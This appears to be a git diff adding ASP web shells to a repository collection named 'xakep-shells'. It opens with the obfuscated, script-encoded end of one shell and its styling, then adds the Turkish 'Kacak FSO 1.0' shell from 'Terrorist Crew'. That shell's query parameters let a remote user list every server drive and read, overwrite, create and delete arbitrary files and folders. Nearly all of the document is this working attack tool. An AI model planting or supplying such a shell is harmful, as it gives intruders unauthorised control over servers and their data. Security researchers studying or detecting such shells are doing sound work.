4Yh,Xmy�XKD!"P(E.Nm3r~bxNaR4Y:,C[ls�x,/rYndbx[+0rPbx[nXB+~L�M+~N�r�bD~s+k+VmP9n0mEsYcld2,0k^Cx9lPKsC4bVbD @!sr@*.nDbzk,M�U[DPP;�!xCP~CkY���h�.NmPb9ls~�x9+ak,Xnhb�Pr^;XKDR@!sr@*~E,k�s+h[P@!0KUY,mGsKD'2r	3@*r0;@!zWKxD@*P0�/s�~AK�PFl^l^C0R@!^r@*zDY�0~ul^l,bUVChmN�z/mU�y,)~hmkV8Gs4@$tKOslr^R1W:,~,4W^X[+sWU@$4WYsCk^RmKh~~,hSh /CUmVO+MGDcW.L,/kOnsk"NU,\n,/bY+,l9hk	P&PsW[smD�x9Cx,XlM[�hPmVm4rVr.kkUk. Pr@#@&./wGUk+ hMrD+~rJLYEk[rE@#@&+UN,/;8@#@&B RO OO RRO O ORORR OR@#@&dE(P^Ck+%@#@&M+dwKUk+ SDbY+,J@!8D@*@!8D@*@!^n	Y+M@*A!P/1.rwDPt+4Nr~:l.l6�UNmx~jcKP)[�	l~5m"�^:��O�MR@!4D@*�mMnY^k~.P�^.Y/b"Pz/w,uG/DVmD�UPP�h�	NnP�ms���DcR@!8M@*b[./~?mO�M�PF�k:�	lPnW9;x!P!�D�	Y�sns+3,�dYNk�bUry,fK/zlU�U,b[�x�,zl.�x  @!4D@*P6OlMnmP$�^�:�,2�+MP~G�/mPulDl~#mDPGn:3Yb. @!(D@*|;D8C	�x~fKdXmVC.�	�PM�.�UD�VnX8bVh3,��kx,bHU�PU+.\D[n,rVsCx�.PSm"�hP_N9Pol.VYh+. R,@!8.@*bN.nkPF�/s�UmPPm:,.+Mk,!kMkskMPc�.	)P9l-S+4'Csk1l	-[+WC!VORmdw@!4.@*@!Vk@*HVnD,emwC(k^kDb:@!8D@*?rYNnVbPk	^V!N+^n.k,Ym3rw~n9+.+0~b9:rU,nlUn^kU+,i^l�hm@!(D@*zNsrx,�kWD/rUbP�l^hl@!4D@*jn/kkKx~.n~;WG3bnPG+�n.^+Dr~�mVCDmV,SGTk	Pr^:m@!4M@*jkD+snMkx,#+MkP:C8l	VmD�U�P�U[bDh+,-/cR E@#@&DndaWU/ SDrD+,JJLY!d[rJ@#@&x[~kE4@#@&B OO RRO O ORORR ORO R@#@&WVIEAA==^#~@%>
+</table>
+<%#@~^CQAAAA==d!4~kYHV+mwMAAA==^#~@%>
+<style>body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}.k1{font-family:Wingdings; font-size:15px;}.k2{font-family:Webdings; font-size:15px;}td{font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;}a{color:#EEEEEE;text-decoration:none;}a:hover{color:#40a0ec;}a:visited{color:#EEEEEE;}a:visited:hover{color:#40a0ec;}input,.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}textarea{background:#121212;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}</style>
+<%#@~^BwAAAA==n	N~kE(oQIAAA==^#~@%>
diff --git a/xakep-shells/ASP/kacak.asp.txt b/xakep-shells/ASP/kacak.asp.txt
new file mode 100644
index 0000000..a3864c2
--- /dev/null
+++ b/xakep-shells/ASP/kacak.asp.txt
@@ -0,0 +1,899 @@
+<html>
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>Kacak FSO 1.0 | Terrorist Crew - Saldiri.Org</title>
+</head>
+
+<body topmargin="0" leftmargin="0" bgcolor="#EAEAEA">
+
+<script language="JavaScript">
+<!--
+function MM_openBrWindow(theURL,winName,features) { //v2.0
+  window.open(theURL,winName,features);
+}
+//-->
+</script>
+
+<%
+if request.querystring("TGH") = "1" then
+on error resume next
+es=request.querystring("Kacak")
+diez=server.urlencode(left(es,(instrRev(es,"\"))-1))
+
+Select case es
+case "C:" diez="C:"
+case "D:" diez="D:"
+end select
+
+
+
+
+%>
+
+
+
+
+
+<body topmargin="0" leftmargin="0"
+onLoad="location.href='?klas=<%=diez%>&usak=1'">
+
+<%
+else
+%>
+
+
+
+<%
+if request.querystring("Dosyakaydet") <> "" then
+set kaydospos=createobject("scripting.filesystemobject")
+set	kaydoses=kaydospos.createtextfile(request.querystring("dosyakaydet") & request("dosadi"))
+set kaydoses=nothing
+set kaydospos=nothing
+set kaydospos=createobject("scripting.filesystemobject")
+set kaydoses=kaydospos.opentextfile(request.querystring("dosyakaydet") & request("dosadi"), 2, true)
+kaydoses.write request("duzenx")
+set kaydoses=nothing
+set kaydospos=nothing
+end if
+%>
+
+
+
+
+
+<%
+if request.querystring("yenidosya") <> "" then
+%>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://img509.imageshack.us/img509/2842/spartaqt5.jpg"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    Kacak �<br>
+    </span>Terrorist Crew<br>
+    <span style="font-weight: 700">
+    <br>
+    KACAK FSO 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="www.kacaq.blogspot.com" style="text-decoration: none">
+    <font color="#858585">GrayHatz ~ TurkGuvenligi.�nfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
+    <font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hotmail.com" style="text-decoration: none"><font color="#858585">@GrayHatz ~ TurkGuvenligi.�nfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;�al���lan Klas�r</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(request.querystring("yenidosya"))%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#B7B7B7">
+    <form method="POST" action="?dosyakaydet=<%=request.querystring("yenidosya")%>&klas=<%=request.querystring("yenidosya")%>" name="kaypos">
+<p align="center"><b><font size="1" face="Verdana">
+<br>
+Dosya Ad� : <br>
+                </font>
+	</b><font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="97" maxlength="32"
+                name="dosadi" value="Dosya Ad�"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullan�c�'"
+                onfocus="if (this.value == 'Kullan�c�') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"><br>
+<br>
+                </font>
+	<b><font size="1" face="Verdana">
+��erik :&nbsp; <br>
+                </font>
+	<font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="95" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Olu�tur"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
+  <tr>
+    <td width="100%" align="right" bgcolor="#000000">
+    <p align="center">
+	&nbsp;</td>
+  </tr>
+</table>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#EAEAEA">
+    <p align="right">
+	&nbsp;</td>
+  </tr>
+</table>
+
+
+
+<%
+else
+%>
+
+
+
+
+
+
+
+<%
+if request.querystring("klasorac") <> "" then
+
+set doses=createobject("scripting.filesystemobject")
+set es=doses.createfolder(request.querystring("aktifklas") & request("duzenx"))
+set es=nothing
+set doses=nothing
+
+
+end if
+%>
+
+<%
+if request.querystring("klasac") <> "" then
+
+set aktifklas=request.querystring("aktifklas")
+
+
+%>
+    <td width="65" bgcolor="#000000" height="76">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber25" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://img509.imageshack.us/img509/2842/spartaqt5.jpg"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    <center>Kacak �<br>
+    </span>Terrorist Crew<br>
+    <span style="font-weight: 700">
+    <br>
+    KACAK FSO 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="www.kacaq.blogspot.com" style="text-decoration: none">
+    <font color="#858585">GrayHatz ~ TurkGuvenligi.�nfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
+    <font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;�al���lan Alan</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=aktifklas%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="174">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#C5C5C5" height="134">
+    <form method="POST" action="?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>" name="klaspos">
+<p align="center"><font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx" value="Klas�r Ad�"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullan�c�'"
+                onfocus="if (this.value == 'Kullan�c�') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center">&nbsp;&nbsp;
+<br>
+<br>
+<br>
+                </font>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Olu�tur"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+
+
+<%
+else
+%>
+
+
+
+<%
+if request.querystring("suruculer") <> "" then
+%>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://img509.imageshack.us/img509/2842/spartaqt5.jpg"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    Kacak �<br>
+    </span>Terrorist Crew<br>
+    <span style="font-weight: 700">
+    <br>
+    KACAK FSO 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="www.kacaq.blogspot.com" style="text-decoration: none">
+    <font color="#858585">www.kacaq.blogspot.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
+    <font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="4">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="4">
+        <span style="font-size: 2pt">&nbsp;</span></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="153">
+  <tr>
+    <td width="100%" height="19" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" height="113" bgcolor="#E1E1E1">&nbsp;<div align="center">
+      <center>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber2" height="17">
+        <tr>
+          <td width="208" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">S�r�c� Ad�</font></td>
+          <td width="75" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Boyutu</font></td>
+          <td width="75" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Bo� Alan</font></td>
+          <td width="64" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Durum</font></td>
+          <td width="62" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">��lem</font></td>
+        </tr>
+      </table>
+      </center>
+    </div>
+    <div align="center">
+      <center>
+
+
+	<%
+	set klassis =server.createobject("scripting.filesystemobject")
+	set klasdri=klassis.drives
+	%>
+	
+	<%
+	for each dongu in klasdri
+	%>
+			
+	<%
+	if dongu.driveletter <> "A" then
+	if dongu.isready=true then
+	%>
+
+	<%
+	select case dongu.drivetype
+	case 0 teype="Di�er"
+	case 1 teype="Ta��n�r"
+	case 2 teype="HDD"
+	case 3 teype="NetWork"
+	case 4 teype="CD-Rom"
+	case 5 teype="FlashMem"
+	end select
+	%>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber3" height="17">
+        <tr>
+          <td width="208" height="17" align="left" bgcolor="#EEEEEE">
+          <font face="Verdana" style="font-size: 8pt">&nbsp;<%=dongu.driveletter%>:\ ( <%=dongu.filesystem%> )</font></td>
+          <td width="75" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=Round(dongu.totalsize/(1024*1024),1)%> MB</font></td>
+          <td width="75" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=Round(dongu.availablespace/(1024*1024),1)%> MB</font></td>
+          <td width="64" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=teype%>&nbsp;</font></td>
+          <td width="62" height="17" align="center" bgcolor="#E0E0E0">
+          <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber24">
+            <tr>
+          <td width="62" height="17" align="center" bgcolor="#E0E0E0"
+          onmouseover="this.style.background='#A0A0A0'"
+          onmouseout="this.style.background='#E0E0E0'"
+          style="CURSOR: hand"
+          
+          >
+          <a href="?klas=<%=dongu.driveletter%>:\" style="text-decoration: none">
+          <font face="Verdana" style="font-size: 8pt" color="#000000">Gir</font></a></td>
+            </tr>
+          </table>
+          </td>
+        </tr>
+      </table>
+
+	<%
+	end if
+	end if
+	%>
+<%
+next
+%>
+
+
+
+      </center>
+    </div>
+    <div align="center">
+      <center>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber4" height="4">
+        <tr>
+          <td width="484" height="4" align="center" bgcolor="#C5C5C5">
+          <span style="font-size: 2pt">&nbsp;</span></td>
+        </tr>
+      </table>
+      </center>
+    </div>
+    <p>&nbsp;</p>
+    </td>
+  </tr>
+  <tr>
+    <td width="100%" height="19" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+
+
+
+
+<%
+else
+%>
+
+
+
+
+
+<%
+if request.querystring("kaydet") <> "" then
+set dossisx=server.createobject("scripting.filesystemobject")
+set dosx=dossisx.opentextfile(request.querystring("kaydet"), 2, true)
+dosx.write request("duzenx")
+dosx.close
+set dosyax=nothing
+set dossisx=nothing
+
+end if
+%>
+
+
+
+
+<%
+if request.querystring("duzenle") <> "" then
+set dossis=server.createobject("scripting.filesystemobject")
+set dos=dossis.opentextfile(request.querystring("duzenle"), 1)
+sedx = dos.readall
+dos.close
+set dosya=nothing
+set dossis=nothing
+
+set aktifklas=request.querystring("klas")
+%>
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://img509.imageshack.us/img509/2842/spartaqt5.jpg"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    Kacak�<br>
+    </span>Terrorist Crew<br>
+    <span style="font-weight: 700">
+    <br>
+    KACAK FSO 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="www.kacaq.blogspot.com" style="text-decoration: none">
+    <font color="#858585">www.kacaq.blogspot.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
+    <font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;�al���lan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(request.querystring("duzenle"))%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    <form method="POST" action="?kaydet=<%=request.querystring("duzenle")%>&klas=<%=aktifklas%>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="163" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
+  <tr>
+    <td width="100%" align="right">
+    <p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><a href=""><input type="reset" size="16"
+		name="x" value="Vazge�"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></a></td>
+  </tr>
+</table>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#EAEAEA">
+    <p align="right">
+	&nbsp;</td>
+  </tr>
+</table>
+
+
+
+<%
+else
+%>
+
+
+<%
+
+if request.querystring("klas") <> "" then
+aktifklas=Request.querystring("klas")
+if request.querystring("usak") = "1" then
+aktifklas=aktifklas & "\"
+end if
+
+else
+aktifklas=server.mappath("/")
+aktifklas=aktifklas & "\"
+end if
+
+if request.querystring("silklas") <> "" then
+set sis=createobject("scripting.filesystemobject")
+silincekklas=request.querystring("silklas")
+sis.deletefolder(silincekklas)
+set sis=nothing
+'response.write(sil & "  Silindi")
+end if
+
+if request.querystring("sildos") <> "" then
+silincekdos=request.querystring("sildos")
+set dosx=createobject("scripting.filesystemobject")
+set dos=dosx.getfile(silincekdos)
+dos.delete
+set dos=nothing
+set dosyasis=nothing
+end if
+
+
+
+
+select case aktifklas
+case "C:" aktifklas="C:\"
+case "D:" aktifklas="D:\"
+case "E:" aktifklas="E:\"
+case "F:" aktifklas="F:\"
+case "G:" aktifklas="G:\"
+case "H:" aktifklas="H:\"
+case "I:" aktifklas="I:\"
+case "J:" aktifklas="J:\"
+case "K:" aktifklas="K:\"
+end select
+
+
+
+if aktifklas=("C:") then aktifklas=("C:\")
+
+Set FS = CreateObject("Scripting.FileSystemObject")
+Set klasor = FS.GetFolder(aktifklas)
+Set altklasorler = klasor.SubFolders
+Set dosyalar = klasor.files
+%>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://img509.imageshack.us/img509/2842/spartaqt5.jpg"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    Kacak �<br><br>
+    </span>Terrorist Crew<br>
+    <span style="font-weight: 700">
+    <br>
+    KACAK FSO 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="www.kacaq.blogspot.com" style="text-decoration: none">
+    <font color="#858585">www.kacaq.blogspot.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
+    <font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;�al���lan Klas�r</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(aktifklas)%></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13">
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+                <a href="?usklas=1&klas=<%=server.urlencode(left(aktifklas,(instrRev(aktifklas,"\"))-1))%>" style="text-decoration: none">
+                <font color="#000000">�st Klas�r</font></a></font></td>
+                
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
